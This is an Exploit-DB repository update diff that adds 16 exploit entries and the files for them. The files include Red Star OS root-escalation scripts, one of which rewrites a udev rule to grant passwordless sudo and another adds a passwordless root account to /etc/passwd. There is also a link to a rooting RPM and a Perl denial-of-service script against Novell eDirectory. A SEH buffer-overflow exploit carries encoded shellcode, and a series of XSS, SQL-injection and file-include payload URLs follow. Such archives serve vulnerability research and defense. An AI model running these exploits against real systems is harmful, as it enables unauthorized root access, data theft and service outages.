Update: 2015-01-12

16 new exploits

files.csv

@@ -32199,3 +32199,19 @@ id,file,description,date,author,platform,type,port
 35739,platforms/php/webapps/35739.txt,"Argyle Social Multiple Cross Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
 35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution Vulnerability",2011-03-04,"Brian Mancini",windows,remote,0
 35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0
+35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-05-13,MustLive,multiple,webapps,0
+35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow Vulnerability",2011-05-16,KedAns-Dz,windows,remote,0
+35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Vulnerability",2011-05-16,KedAns-Dz,php,webapps,0
+35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ?sfan55",linux,local,0
+35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0
+35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)",2015-01-11,RichardG,linux,local,0
+35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0
+35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service Vulnerability",2011-05-16,Knud,multiple,dos,0
+35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 'login/login.php' Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
+35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 'history.php' Cross Site Scripting Vulnerability",2011-05-12,"AutoSec Tools",php,webapps,0
+35756,platforms/php/webapps/35756.txt,"openQRM 4.8 'source_tab' Parameter Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
+35757,platforms/php/webapps/35757.txt,"eFront <= 3.6.9 'scripts.php' Local File Include Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
+35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0
+35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 'submitScore.php' Cross Site Scripting Vulnerability",2011-05-16,"John Leitch",php,webapps,0
+35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0
+35761,platforms/php/webapps/35761.txt,"TWiki <= 5.0.1 'origurl' Parameter Cross Site Scripting Vulnerability",2011-05-18,"Mesut Timur",php,webapps,0

platforms/asp/webapps/35758.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47874/info
+
+Mitel Audio and Web Conferencing is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Audio and Web Conferencing 4.4.3.0 is vulnerable; other versions may also be affected.
+
+https://www.example.com/wd/wdinvite.asp?SID=&#039;><script>alert(1)</script>
+
+https://www.example.com/wd/connect.asp?mode=joinmeeting&uid=&#039;><script>alert(1)</script>&sid=&#039;><script>alert(1)</script>
+
+https://www.example.com/wd/applets/Error.asp?type=</span><script>alert(1)</script>

platforms/linux/local/35746.sh

@@ -0,0 +1,19 @@
+#!/bin/bash -e
+
+## Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png
+## Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png
+
+cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
+echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
+cat <<EOF >/tmp/r00t.sh
+echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
+mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
+chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
+rm /tmp/r00t.sh
+EOF
+chmod +x /tmp/r00t.sh
+echo "sudo will be available after reboot"
+sleep 2
+reboot
+
+## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6

platforms/linux/local/35748.txt

@@ -0,0 +1,12 @@
+Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit"
+which can be abused to execute commands on
+boot. An example exploitation of this vulnerability is shown here
+https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png
+
+PoC:
+
+/bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd
+su - root
+
+
+## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6

platforms/linux/local/35749.txt

@@ -0,0 +1,16 @@
+The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. 
+UnFortunately, they left a big security hole: the Software Manager (swmng.app), 
+which runs as root through sudo and will install any RPM package, even if unsigned.
+
+To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key,
+double-click it to open it with the Software Manager, and click through the blue buttons until it’s done.
+After that, run rootsh to get a root shell. 
+Being a RedHat-based system (hinting on Fedora 15), SELinux will prevent you from doing some things, 
+but disabling it is a matter of running setenforce 0 as root.
+
+
+Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
+Mirror: http://www.exploit-db.com/sploits/redstarroot.rpm
+
+
+## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1

platforms/multiple/dos/35753.pl

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/47858/info
+
+Novell eDirectory and Netware are prone to a denial-of-service vulnerability.
+
+Remote attackers can exploit this issue to cause a system-wide denial-of-service. 
+
+#!/usr/bin/perl
+      # usage: ./novell.pl 10.0.0.1 0x41424344
+      use IO::Socket::SSL;
+      $socket = new IO::Socket::SSL(Proto=>"tcp",
+      PeerAddr=>$ARGV[0], PeerPort=>636);
+      die "unable to connect to $host:$port ($!)\n" unless $socket;
+      print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
+      "\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
+      close $socket; print "done\n";
+
+

platforms/multiple/webapps/35743.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/47845/info
+
+The Flash Tag Cloud widget and the MT-Cumulus Plugin are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following versions are affected:
+
+Flash Tag Cloud For MT 4
+MT-Cumulus 1.02 and prior versions 
+
+http://www.example.com/scripts/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
+
+http://www.example.com/mt/mt-static/plugins/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E 

platforms/php/webapps/35745.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/47856/info
+
+The 'com_cbcontact' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_cbcontact&task=vcard&contact_id=-11[SQLi]
+http://www.example.com/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi] 

platforms/php/webapps/35752.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/47857/info
+
+The 'com_docman' component for Mambo is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+'com_docman' 1.3 is vulnerable. 
+
+http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=-11[SQLi]
+http://www.example.com/[path]/index.php?option=com_docman&task=cat_view&gid=3&Itemid=7&limit=15&limitstart=-11[SQLi] 

platforms/php/webapps/35754.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47860/info
+
+allocPSA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+allocPSA 1.7.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/allocPSA-1.7.4/login/login.php?sessID=%3Cscript%3Ealert%280%29%3C/script%3E 

platforms/php/webapps/35755.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47861/info
+
+DocMGR is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+DocMGR 1.1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/docmgr/history.php?f=0%22%29;}alert%280%29;{// 

platforms/php/webapps/35756.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47865/info
+
+openQRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+openQRM 4.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/openqrm-4.8/src/plugins/zfs-storage/web/zfs-storage-action.php?source_tab="<script>alert(0)</script>

platforms/php/webapps/35757.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47870/info
+
+eFront is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 

platforms/php/webapps/35759.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47877/info
+
+eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/efront/www/modules/module_crossword/app/submitScore.php?seq=<script>alert(0)</script>&cookie=<script>alert(0)</script>

platforms/php/webapps/35760.txt

@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/47887/info
+
+PHP Calendar Basic is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PHP Calendar Basic 2.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?month=5"><script>alert(&#039;XSS&#039;)</script>&year=2011"><sc ript>alert(document.cookie)</script>
+
+<form action="http://www.example.com/event_add.php?day=27&month=4&year=2011" method="post" name="main">
+<input type="hidden" name="month" value="4">
+<input type="hidden" name="day" value="27">
+<input type="hidden" name="year" value="2011">
+<input type="hidden" name="hour" value="20">
+<input type="hidden" name="minute" value="00">
+<input type="hidden" name="title" value="1<script>alert(&#039;XSS&#039;)</script>">
+<input type="hidden" name="description" value="descr">
+<input type="submit" id="btn" name="submit" value="Add Event">
+</form>
+<script>
+document.getElementById(&#039;btn&#039;).click();
+</script>
+
+
+http://www.example.com/event_delete.php?day=28&month=4&year=2011&id=1"><script>alert(document.c ookie)</script>
+

platforms/php/webapps/35761.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/47899/info
+
+TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to TWiki 5.0.2 are vulnerable. 
+
+
+GET /twiki/bin/login/Sandbox/WebHome?%27%221=;origurl=1%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x00039C%29%3C/script%3E
+
+GET /twiki/bin/login/Sandbox/WebHome?sudo=sudo;origurl=http://10.1.10.128/bin/view/Main/TWikiAdminUser%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x00044C%29%3C%2Fscript%3E

platforms/windows/remote/35744.pl

@@ -0,0 +1,93 @@
+source: http://www.securityfocus.com/bid/47851/info
+
+AVS Ringtone Maker is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
+
+AVS Ringtone Maker 1.6.1 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+system("cls");
+sub logo(){
+print q'
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+1                      ______                                          0
+0                   .-"      "-.                                       1
+1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0
+0 Algerian HaCker |              | > Site : 1337day.com |              1
+1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
+0                 | )(_o/  \o_)( | > ked-h@hotmail.com  |              1
+1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0
+0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1
+1  _     ) \_______\__|IIIIII|__/_______________________               0
+0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
+1        )_/        \          /                                       0
+0       (@           `--------` ? 2011, Inj3ct0r Team                  1
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
+0       AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit                1
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
+';
+}
+logo();
+###
+# Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
+# Twitter page : twitter.com/kedans
+# platform : windows
+# Tested on : Windows XP sp3 FR 
+##
+# Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC !
+###
+
+my $junk = "\x41" x 4123 ; # Buffer Junk
+my $jump = "\xeb\x06\x90\x90"; #  Short Jump
+my $eip = pack("V", 0x00401E3C); # EIP
+my $seh = pack("V", 0x7C839AC0); # SEH
+
+# windows/exec - 511 bytes ( http://www.metasploit.com)
+# Encoder: x86/alpha_mixed
+# EXITFUNC=seh, CMD=calc.exe
+my $shellcode = "\xe8\x52\xe6\xff\xff\x90\x90".
+"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
+"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
+"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
+"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
+"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
+"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
+"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
+"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
+"\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" .
+"\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" .
+"\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" .
+"\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" .
+"\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" .
+"\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" .
+"\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" .
+"\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" .
+"\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" .
+"\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" .
+"\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" .
+"\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" .
+"\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" .
+"\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" .
+"\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" .
+"\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" .
+"\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" .
+"\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" .
+"\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" .
+"\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" .
+"\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" .
+"\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" .
+"\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" .
+"\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" .
+"\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" .
+"\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" .
+"\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" .
+"\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" .
+"\x68\x50\x65\x47\x70\x41\x41";
+my $exploit = $junk.$jump.$eip.$seh.$shellcode;
+open (FILE ,'> KedAns.wav');
+print FILE $exploit;